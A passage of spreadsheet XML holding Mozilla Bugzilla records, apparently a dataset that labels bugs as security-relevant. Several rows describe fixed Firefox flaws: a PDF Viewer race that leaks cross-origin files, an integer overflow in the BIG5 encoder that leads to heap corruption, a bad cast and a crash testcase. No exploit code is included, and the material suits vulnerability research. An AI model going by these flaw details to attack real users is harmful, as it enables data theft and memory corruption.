and the applet should contain:
/*
 * This is the path to the applet filename:
 * */
package tmp.DumbUglyB1llMarriedDumbUglyB1tch;
public class a1 extends Applet {</t>
        </is>
      </c>
      <c r="X3002" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3003">
      <c r="A3003" t="n">
        <v>1449898</v>
      </c>
      <c r="B3003" t="inlineStr">
        <is>
          <t>2018-03-29 04:00:35 -0700</t>
        </is>
      </c>
      <c r="C3003" t="inlineStr">
        <is>
          <t>Race condition in PDF Viewer allows circumventing same-origin policy for PDF files</t>
        </is>
      </c>
      <c r="D3003" t="inlineStr">
        <is>
          <t>2024-05-30 09:44:26 -0700</t>
        </is>
      </c>
      <c r="E3003" t="n">
        <v>1</v>
      </c>
      <c r="F3003" t="n">
        <v>1</v>
      </c>
      <c r="G3003" t="n">
        <v>2</v>
      </c>
      <c r="H3003" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3003" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3003" t="inlineStr">
        <is>
          <t>PDF Viewer</t>
        </is>
      </c>
      <c r="K3003" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3003" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3003" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3003" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3003" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3003" t="inlineStr">
        <is>
          <t>[adv-main60+][adv-esr52.8+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q3003" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3003" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3003" t="inlineStr">
        <is>
          <t>Firefox 61</t>
        </is>
      </c>
      <c r="T3003" t="n">
        <v>1</v>
      </c>
      <c r="U3003" t="n">
        <v>0</v>
      </c>
      <c r="V3003" t="n">
        <v>38</v>
      </c>
      <c r="W3003" t="inlineStr">
        <is>
          <t>Created attachment 8963531
Proof of concept page
When a PDF file opens in the built-in PDF Viewer, the stream converter will retrieve the file data and post it as a message to the viewer (see https://dxr.mozilla.org/mozilla-central/rev/a456475502b80a1264642d9eaee9394a8fad8315/browser/extensions/pdfjs/content/PdfStreamConverter.jsm#605). When doing this, it specifies "*" as the recipient's origin. So if the PDF Viewer got replaced by another document in the meantime, that other document will receive the message.
Steps to reproduce:
1. Open the attached proof of concept page.
2. Enter the URL of a PDF file into the text field and click "Download"
3. Wait a bit.
When testing with https://www.microsoft.com/en-us/research/wp-content/uploads/2006/11/www2007.pdf, this page succeeds within a few seconds for me and displays the first 160 bytes of the PDF file. It does that by loading the PDF in a hidden frame first to make sure that it is cached. After that it will 
repeatedly load the PDF file in a frame, then replace the frame contents by about:blank after a random time interval.
I am not entirely sure why it doesn't work reliably with other PDF files for me, but with some tweaks to the timing it should be possible. So a malicious website should be able to retrieve PDF files in the background that only the website visitor can access. That might be documents on the intranet for example, or private documents on some storage service.
I tested with Firefox 59.0.2 and Firefox 61.0a1 (2018-03-28) nightly on Linux.</t>
        </is>
      </c>
      <c r="X3003" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3004">
      <c r="A3004" t="n">
        <v>1074280</v>
      </c>
      <c r="B3004" t="inlineStr">
        <is>
          <t>2014-09-29 10:13:57 -0700</t>
        </is>
      </c>
      <c r="C3004" t="inlineStr">
        <is>
          <t>Bad casting: From BasicThebesLayer to BasicContainerLayer</t>
        </is>
      </c>
      <c r="D3004" t="inlineStr">
        <is>
          <t>2024-05-30 08:37:27 -0700</t>
        </is>
      </c>
      <c r="E3004" t="n">
        <v>1</v>
      </c>
      <c r="F3004" t="n">
        <v>1</v>
      </c>
      <c r="G3004" t="n">
        <v>3</v>
      </c>
      <c r="H3004" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3004" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3004" t="inlineStr">
        <is>
          <t>Graphics: Layers</t>
        </is>
      </c>
      <c r="K3004" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3004" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3004" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3004" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3004" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3004" t="inlineStr">
        <is>
          <t>[adv-main34+][adv-esr31.3+]</t>
        </is>
      </c>
      <c r="Q3004" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3004" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3004" t="inlineStr">
        <is>
          <t>mozilla35</t>
        </is>
      </c>
      <c r="T3004" t="n">
        <v>1</v>
      </c>
      <c r="U3004" t="n">
        <v>0</v>
      </c>
      <c r="V3004" t="n">
        <v>19</v>
      </c>
      <c r="W3004" t="inlineStr">
        <is>
          <t>Created attachment 8496944
layout.txt
User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36
Steps to reproduce:
Hi Firefox,
We have recently developed a runtime detection tool to identify undefined behaviors in static_cast (similar to -fsanitize=object-size/-fsanitize=vptr in Clang, but we improved to find undefined behaviors). Please see our confirmed other bug reports in libstdc++ (https://gcc.gnu.org/bugzilla/show_bug.cgi?id=63345). We have built/run Firefox using our instrumentation tool, and also found several bad castings in Firefox (let us report an issue one by one). 
-----------------------------------------------------------
// gfx/layers/basic/BasicLayerManager.cpp,
// aLayer might not be a container layer, but if so we take care not to use                                                                                                
// the container variable                                                                                                                                                  
BasicContainerLayer* container = static_cast&lt;BasicContainerLayer*&gt;(aLayer);
-----------------------------------------------------------
Here, aLayer is pointing to the object allocated as BasicThebesLayer, and it is casted into BasicContainerLayer. However, since BasicContainerLayer is not a subobject of BasicThebesLayer, it is violating C++ standard rules 5.2.9/11--down casting is undefined if the object that the pointer to be casted points to is not a suboject of down casting type-- and causes undefined behaviors.
Class layouts for BasicThebesLayer and BasicContainerLayer are attached, and pasted the error reports from our tool.
Actual results:
==  Bad-casting reports
/home/blee/project/firefox/firefox/gfx/layers/basic/BasicLayerManager.cpp:800:36: Casting from 'mozilla::layers::BasicThebesLayer' to 'mozilla::layers::BasicContainerLayer'
         Pointer         0x62a000093d00
         Alloc base      0x62a000093d00
         User base       0x62a000093d00
         Offset          0x000000000000
         TypeTable       0x7f3f47d14d40
    #0 0x7f3f43edb057 in PaintLayer /home/blee/project/firefox/firefox/gfx/layers/basic/BasicLayerManager.cpp:800
    #1 0x7f3f43edbe09 in PaintSelfOrChildren /home/blee/project/firefox/firefox/gfx/layers/basic/BasicLayerManager.cpp:744
    #2 0x7f3f43edb2f8 in PaintLayer /home/blee/project/firefox/firefox/gfx/layers/basic/BasicLayerManager.cpp:847
    #3 0x7f3f43edbe09 in PaintSelfOrChildren /home/blee/project/firefox/firefox/gfx/layers/basic/BasicLayerManager.cpp:744
    #4 0x7f3f43edb2f8 in PaintLayer /home/blee/project/firefox/firefox/gfx/layers/basic/BasicLayerManager.cpp:847
    #5 0x7f3f43eda13f in EndTransactionInternal /home/blee/project/firefox/firefox/gfx/layers/basic/BasicLayerManager.cpp:524
    #6 0x7f3f450cb55e in PaintFramesWithEffects /home/blee/project/firefox/firefox/layout/svg/nsSVGIntegrationUtils.cpp:544
    #7 0x7f3f44f4b073 in PaintInactiveLayer /home/blee/project/firefox/firefox/layout/base/FrameLayerBuilder.cpp:2592
    #8 0x7f3f44f4ba8d in DrawThebesLayer /home/blee/project/firefox/firefox/layout/base/FrameLayerBuilder.cpp:4497
    #9 0x7f3f43ef325a in PaintBuffer /home/blee/project/firefox/firefox/gfx/layers/basic/BasicThebesLayer.h:116
    #10 0x7f3f43ee3001 in Validate /home/blee/project/firefox/firefox/gfx/layers/basic/BasicThebesLayer.cpp:184
    #11 0x7f3f43ed90e2 in Validate /home/blee/project/firefox/firefox/gfx/layers/basic/BasicContainerLayer.cpp:128
    #12 0x7f3f43ed9feb in EndTransactionInternal /home/blee/project/firefox/firefox/gfx/layers/basic/BasicLayerManager.cpp:493</t>
        </is>
      </c>
      <c r="X3004" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3005">
      <c r="A3005" t="n">
        <v>1440926</v>
      </c>
      <c r="B3005" t="inlineStr">
        <is>
          <t>2018-02-24 07:31:29 -0800</t>
        </is>
      </c>
      <c r="C3005" t="inlineStr">
        <is>
          <t>Overflow in nsUnicodeToBIG5::GetMaxLength can create memory-safety bugs in callers</t>
        </is>
      </c>
      <c r="D3005" t="inlineStr">
        <is>
          <t>2024-05-30 09:43:22 -0700</t>
        </is>
      </c>
      <c r="E3005" t="n">
        <v>1</v>
      </c>
      <c r="F3005" t="n">
        <v>1</v>
      </c>
      <c r="G3005" t="n">
        <v>3</v>
      </c>
      <c r="H3005" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3005" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3005" t="inlineStr">
        <is>
          <t>Internationalization</t>
        </is>
      </c>
      <c r="K3005" t="inlineStr">
        <is>
          <t>52 Branch</t>
        </is>
      </c>
      <c r="L3005" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3005" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3005" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3005" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3005" t="inlineStr">
        <is>
          <t>[adv-esr52.7+]</t>
        </is>
      </c>
      <c r="Q3005" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3005" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3005" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3005" t="n">
        <v>1</v>
      </c>
      <c r="U3005" t="n">
        <v>0</v>
      </c>
      <c r="V3005" t="n">
        <v>17</v>
      </c>
      <c r="W3005" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:57.0) Gecko/20100101 Firefox/57.0
Build ID: 20171128222554
Steps to reproduce:
nsUnicodeToBIG5::GetMaxLength (/ff-esr52/intl/uconv/ucvtw/nsUnicodeToBIG5.cpp) performs an unchecked integer computation based on the int32 value provided by the caller, and returns the result in the int32 out parameter provided by the caller:
NS_IMETHODIMP
nsUnicodeToBIG5::GetMaxLength(const char16_t* aSrc,
                              int32_t aSrcLength,
                              int32_t* aDestLength)
{
  *aDestLength = (aSrcLength * 2) + // &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt; (0)
                 (mPendingTrail ? 1 : 0) +
                 // If the lead ends up being paired, the bytes produced
                 // are already included above.
                 // If not, it produces a single '?'.
                 (mUtf16Lead ? 1 : 0);
  return NS_OK;
}
In case that aSrcLength is 0x7fffffff, or even 0x7ffffffd if the two flags mPendingTrail and mUtf16Lead are set to true, aDestLength will overflow at (0), and a near-zero negative value will be returned to the caller.
nsUnicodeToBIG5 is a member of nsIUnicodeEncoder family of classes, which provides an abstracted Unicode encoding facility to a variety of callers around the code base, including DOM and Javascript engines, which operate almost entirely on user-controlled data. The various nsUnicodeTo* classes may be invoked via a dispatcher instance of nsIUnicodeEncoder, as follows, for instance:
nsCOMPtr&lt;nsIUnicodeEncoder&gt; mEncoder;
mEncoder = EncodingUtils::EncoderForEncoding(charset); // charset value may be obtained from user-controlled data
mEncoder-&gt;GetMaxLength(src, src.Length(), ...);
In case that the charset is set to "big5", nsUnicodeToBIG5::GetMaxLength will be called. 
GetMaxLength is declared as follows in nsIUnicodeEncoder.h: 
  /**
   * Returns a quick estimation of the size of the buffer needed to hold the
   * converted data. Remember: this estimation is &gt;= with the actual size of 
   * the buffer needed. It will be computed for the "worst case"
   *
   * @param aSrc        [IN] the source data buffer
   * @param aSrcLength  [IN] the length of source data buffer
   * @param aDestLength [OUT] the needed size of the destination buffer
   * @return            NS_OK_UENC_EXACTLENGTH if an exact length was computed
   *                    NS_ERROR_OUT_OF_MEMORY if OOM
   *                    NS_OK if all we have is an approximation
   */
  MOZ_MUST_USE NS_IMETHOD GetMaxLength(const char16_t* aSrc,
                                       int32_t aSrcLength,
                                       int32_t* aDestLength) = 0;
...
Note that because GetMaxLength is prototyped as fallible, the callers expect it to signal of any internal failure, and therefore are unlikely to double-check the validity of the returned value.
The implications of a buffer size estimation procedure returning a negative value are almost certainly security relevant, however the actual impact depends on how exactly the caller uses the returned value. Consider for example, nsScriptableUnicodeConverter::ConvertFromUnicodeWithLength (/ff-esr52/intl/uconv/nsScriptableUConv.cpp):
nsresult
nsScriptableUnicodeConverter::ConvertFromUnicodeWithLength(const nsAString&amp; aSrc,
                                                           int32_t* aOutLen,
                                                           char **_retval)
{
  if (!mEncoder)
    return NS_ERROR_FAILURE;
  nsresult rv = NS_OK;
  int32_t inLength = aSrc.Length();
  const nsAFlatString&amp; flatSrc = PromiseFlatString(aSrc);
  rv = mEncoder-&gt;GetMaxLength(flatSrc.get(), inLength, aOutLen); // &lt;&lt;&lt; (1)
  if (NS_SUCCEEDED(rv)) {
    *_retval = (char*)malloc(*aOutLen+1); // &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt; (2)
    if (!*_retval)
      return NS_ERROR_OUT_OF_MEMORY;
    rv = mEncoder-&gt;Convert(flatSrc.get(), &amp;inLength, *_retval, aOutLen); // &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt; (3)
    if (NS_SUCCEEDED(rv))
    {
      (*_retval)[*aOutLen] = '\0'; // &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt; (4)
      return NS_OK;
    }
    free(*_retval);
  }
  *_retval = nullptr;
  return NS_ERROR_FAILURE;
}
At (1), GetMaxLength() can return -1 (0xffffffff), which then would be used by malloc at (2) to allocate a buffer of size 0, leading to a heap corruption (i.e. a buffer overflow, or nulling of the trailing byte of the preceding heap chunk) at either (3) or/and (4). 
There are also other places in the code base, where GetMaxLength() is used in a similar fashion.
The issue was verified with the latest release code of Firefox ESR.
Actual results:
n/a
Expected results:
n/a</t>
        </is>
      </c>
      <c r="X3005" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3006">
      <c r="A3006" t="n">
        <v>1204669</v>
      </c>
      <c r="B3006" t="inlineStr">
        <is>
          <t>2015-09-14 14:32:30 -0700</t>
        </is>
      </c>
      <c r="C3006" t="inlineStr">
        <is>
          <t>nsXBLService::GetBinding is still crashing</t>
        </is>
      </c>
      <c r="D3006" t="inlineStr">
        <is>
          <t>2016-07-02 11:19:08 -0700</t>
        </is>
      </c>
      <c r="E3006" t="n">
        <v>1</v>
      </c>
      <c r="F3006" t="n">
        <v>1</v>
      </c>
      <c r="G3006" t="n">
        <v>3</v>
      </c>
      <c r="H3006" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3006" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3006" t="inlineStr">
        <is>
          <t>XBL</t>
        </is>
      </c>
      <c r="K3006" t="inlineStr">
        <is>
          <t>36 Branch</t>
        </is>
      </c>
      <c r="L3006" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3006" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3006" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3006" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3006" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main42+][adv-esr38.4+]</t>
        </is>
      </c>
      <c r="Q3006" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3006" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3006" t="inlineStr">
        <is>
          <t>mozilla44</t>
        </is>
      </c>
      <c r="T3006" t="n">
        <v>1</v>
      </c>
      <c r="U3006" t="n">
        <v>0</v>
      </c>
      <c r="V3006" t="n">
        <v>18</v>
      </c>
      <c r="W3006" t="inlineStr">
        <is>
          <t>See https://bugzilla.mozilla.org/show_bug.cgi?id=1202844#c18</t>
        </is>
      </c>
      <c r="X3006" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3007">
      <c r="A3007" t="n">
        <v>728253</v>
      </c>
      <c r="B3007" t="inlineStr">
        <is>
          <t>2012-02-17 08:49:15 -0800</t>
        </is>
      </c>
      <c r="C3007" t="inlineStr">
        <is>
          <t>MWC demo: BrowserQuest game for tablets</t>
        </is>
      </c>
      <c r="D3007" t="inlineStr">
        <is>
          <t>2012-02-20 02:55:07 -0800</t>
        </is>
      </c>
      <c r="E3007" t="n">
        <v>1</v>
      </c>
      <c r="F3007" t="n">
        <v>1</v>
      </c>
      <c r="G3007" t="n">
        <v>5</v>
      </c>
      <c r="H3007" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3007" t="inlineStr">
        <is>
          <t>Marketing</t>
        </is>
      </c>
      <c r="J3007" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3007" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3007" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3007" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3007" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3007" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3007" t="inlineStr"/>
      <c r="Q3007" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3007" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S3007" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3007" t="n">
        <v>1</v>
      </c>
      <c r="U3007" t="n">
        <v>0</v>
      </c>
      <c r="V3007" t="n">
        <v>2</v>
      </c>
      <c r="W3007" t="inlineStr">
        <is>
          <t>Works on tablets and some phones (not Desire HTC, but works with Galaxy Nexus), current plan is to demo only on tablets</t>
        </is>
      </c>
      <c r="X3007" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3008">
      <c r="A3008" t="n">
        <v>1192313</v>
      </c>
      <c r="B3008" t="inlineStr">
        <is>
          <t>2015-08-07 10:05:53 -0700</t>
        </is>
      </c>
      <c r="C3008" t="inlineStr">
        <is>
          <t>front-page and /daily graph are off-by-one day</t>
        </is>
      </c>
      <c r="D3008" t="inlineStr">
        <is>
          <t>2015-08-11 08:09:40 -0700</t>
        </is>
      </c>
      <c r="E3008" t="n">
        <v>1</v>
      </c>
      <c r="F3008" t="n">
        <v>1</v>
      </c>
      <c r="G3008" t="n">
        <v>4</v>
      </c>
      <c r="H3008" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3008" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J3008" t="inlineStr">
        <is>
          <t>Webapp</t>
        </is>
      </c>
      <c r="K3008" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3008" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3008" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3008" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3008" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3008" t="inlineStr"/>
      <c r="Q3008" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3008" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3008" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3008" t="n">
        <v>1</v>
      </c>
      <c r="U3008" t="n">
        <v>0</v>
      </c>
      <c r="V3008" t="n">
        <v>10</v>
      </c>
      <c r="W3008" t="inlineStr">
        <is>
          <t>Looking at the front-page and /daily graph on prod right now, the tooltip says "Aug 5 2015" but the data is clearly from August 6th:
https://crash-stats.mozilla.com/daily?p=Firefox
Look at the table at the bottom of the page vs. the graph. There happens to be a big spike in Nightly crashes today, which makes it quite easy to see.</t>
        </is>
      </c>
      <c r="X3008" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3009">
      <c r="A3009" t="n">
        <v>431260</v>
      </c>
      <c r="B3009" t="inlineStr">
        <is>
          <t>2008-04-28 18:09:12 -0700</t>
        </is>
      </c>
      <c r="C3009" t="inlineStr">
        <is>
          <t>Crash [@ gfxSkipCharsIterator::SetOffsets] with ::first-letter, position: absolute and setting innerHTML on root</t>
        </is>
      </c>
      <c r="D3009" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:47 -0700</t>
        </is>
      </c>
      <c r="E3009" t="n">
        <v>1</v>
      </c>
      <c r="F3009" t="n">
        <v>1</v>
      </c>
      <c r="G3009" t="n">
        <v>3</v>
      </c>
      <c r="H3009" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3009" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3009" t="inlineStr">
        <is>
          <t>Layout: Text and Fonts</t>
        </is>
      </c>
      <c r="K3009" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3009" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3009" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3009" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3009" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3009" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q3009" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R3009" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3009" t="inlineStr">
        <is>
          <t>mozilla1.9.2a1</t>
        </is>
      </c>
      <c r="T3009" t="n">
        <v>1</v>
      </c>
      <c r="U3009" t="n">
        <v>0</v>
      </c>
      <c r="V3009" t="n">
        <v>49</v>
      </c>
      <c r="W3009" t="inlineStr">
        <is>
          <t>Created attachment 318291
testcase 1 (crashes firefox)
Marking security sensitive, just in case.
See testcase, which crashes current trunk build, within 100ms or a little later.
This seems to have regressed between 2007-09-16 and 2007-09-18:
http://bonsai.mozilla.org/cvsquery.cgi?treeid=default&amp;module=all&amp;branch=HEAD&amp;branchtype=match&amp;dir=&amp;file=&amp;filetype=match&amp;who=&amp;whotype=match&amp;sortby=Date&amp;hours=2&amp;date=explicit&amp;mindate=2007-09-16+22&amp;maxdate=2007-09-18+05&amp;cvsroot=%2Fcvsroot
Regression from bug 385607 or from bug 393796?
http://crash-stats.mozilla.com/report/index/20407c45-1586-11dd-8e99-001321b13766?p=1
0  	xul.dll  	gfxSkipCharsIterator::SetOffsets  	 mozilla/gfx/thebes/src/gfxSkipChars.cpp:129
1 	xul.dll 	gfxSkipCharsIterator::SetOriginalOffset 	gfxSkipChars.h:265
2 	xul.dll 	xul.dll@0x2aeae9 	
3 	xul.dll 	nsLineLayout::ReflowFrame 	mozilla/layout/generic/nsLineLayout.cpp:859
4 	xul.dll 	nsFirstLetterFrame::Reflow 	mozilla/layout/generic/nsFirstLetterFrame.cpp:240</t>
        </is>
      </c>
      <c r="X3009" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3010">
      <c r="A3010" t="n">
        <v>1423067</v>
      </c>
      <c r="B3010" t="inlineStr">
        <is>
          <t>2017-12-04 19:45:41 -0800</t>
        </is>
      </c>
      <c r="C3010" t="inlineStr">
        <is>
          <t>Sync tabs sidebar doesn't reflect "needs reauth" state</t>
        </is>
      </c>
      <c r="D3010" t="inlineStr">
        <is>
          <t>2017-12-06 02:02:45 -0800</t>
        </is>
      </c>
      <c r="E3010" t="n">
        <v>1</v>
      </c>
      <c r="F3010" t="n">
        <v>1</v>
      </c>
      <c r="G3010" t="n">
        <v>2</v>
      </c>
      <c r="H3010" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3010" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3010" t="inlineStr">
        <is>
          <t>Sync</t>
        </is>
      </c>
      <c r="K3010" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3010" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3010" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3010" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3010" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3010" t="inlineStr"/>
      <c r="Q3010" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3010" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3010" t="inlineStr">
        <is>
          <t>Firefox 59</t>
        </is>
      </c>
      <c r="T3010" t="n">
        <v>1</v>
      </c>
      <c r="U3010" t="n">
        <v>0</v>
      </c>
      <c r="V3010" t="n">
        <v>5</v>
      </c>
      <c r="W3010" t="inlineStr">
        <is>
          <t>STR:
* Start the browser with the synced tabs sidebar open while sync is in a "needs reauth" state.
Expected:
* The sidebar should reflect this state.
Actual:
* The sidebar remains blank.
The problem is that the sidebar checks |this._SyncedTabs.loginFailed|, but that isn't correctly exported by SyncedTabs.jsm.</t>
        </is>
      </c>
      <c r="X3010" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3011">
      <c r="A3011" t="n">
        <v>514600</v>
      </c>
      <c r="B3011" t="inlineStr">
        <is>
          <t>2009-09-03 20:08:43 -0700</t>
        </is>
      </c>
      <c r="C3011" t="inlineStr">
        <is>
          <t>Track how long various parts of sync take</t>
        </is>
      </c>
      <c r="D3011" t="inlineStr">
        <is>
          <t>2018-09-24 14:24:50 -0700</t>
        </is>
      </c>
      <c r="E3011" t="n">
        <v>1</v>
      </c>
      <c r="F3011" t="n">
        <v>1</v>
      </c>
      <c r="G3011" t="n">
        <v>2</v>
      </c>
      <c r="H3011" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3011" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3011" t="inlineStr">
        <is>
          <t>Sync</t>
        </is>
      </c>
      <c r="K3011" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3011" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3011" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3011" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3011" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3011" t="inlineStr"/>
      <c r="Q3011" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3011" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3011" t="inlineStr">
        <is>
          <t>0.7</t>
        </is>
      </c>
      <c r="T3011" t="n">
        <v>1</v>
      </c>
      <c r="U3011" t="n">
        <v>0</v>
      </c>
      <c r="V3011" t="n">
        <v>4</v>
      </c>
      <c r="W3011" t="inlineStr">
        <is>
          <t>We can instrument the functions on the sync engine object and show the total times in the log.
Right now I'm seeing some values like these.. at 8pm:
2009-09-03 20:03:16	Engine.Clients       INFO	Total (ms): processIncoming 64, sync 66, syncFinish 0, syncStartup 1, uploadOutgoing 1
2009-09-03 20:03:16	Engine.Bookmarks     INFO	Total (ms): processIncoming 68, sync 71, syncFinish 0, syncStartup 1, uploadOutgoing 1
2009-09-03 20:03:16	Engine.Forms         INFO	Total (ms): processIncoming 69, sync 110, syncFinish 35, syncStartup 4, uploadOutgoing 1
2009-09-03 20:03:16	Engine.History       INFO	Total (ms): processIncoming 67, sync 108, syncFinish 39, syncStartup 1, uploadOutgoing 1
2009-09-03 20:03:16	Engine.Passwords     INFO	Total (ms): processIncoming 104, sync 106, syncFinish 0, syncStartup 0, uploadOutgoing 1
2009-09-03 20:03:17	Engine.Prefs         INFO	Total (ms): processIncoming 79, sync 82, syncFinish 0, syncStartup 0, uploadOutgoing 12009-09-03 20:03:17	Engine.Tabs          INFO	Total (ms): createRecord 4, processIncoming 56, sync 112, syncFinish 0, syncStartup 0, uploadOutgoing 56
These are all getting 0 records from the server, so processIncoming is "latency + 0 results" and that's ~70ms. Form and History send a DELETE in syncFinish, and those take ~40ms.</t>
        </is>
      </c>
      <c r="X3011" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3012">
      <c r="A3012" t="n">
        <v>1722204</v>
      </c>
      <c r="B3012" t="inlineStr">
        <is>
          <t>2021-07-24 21:35:49 -0700</t>
        </is>
      </c>
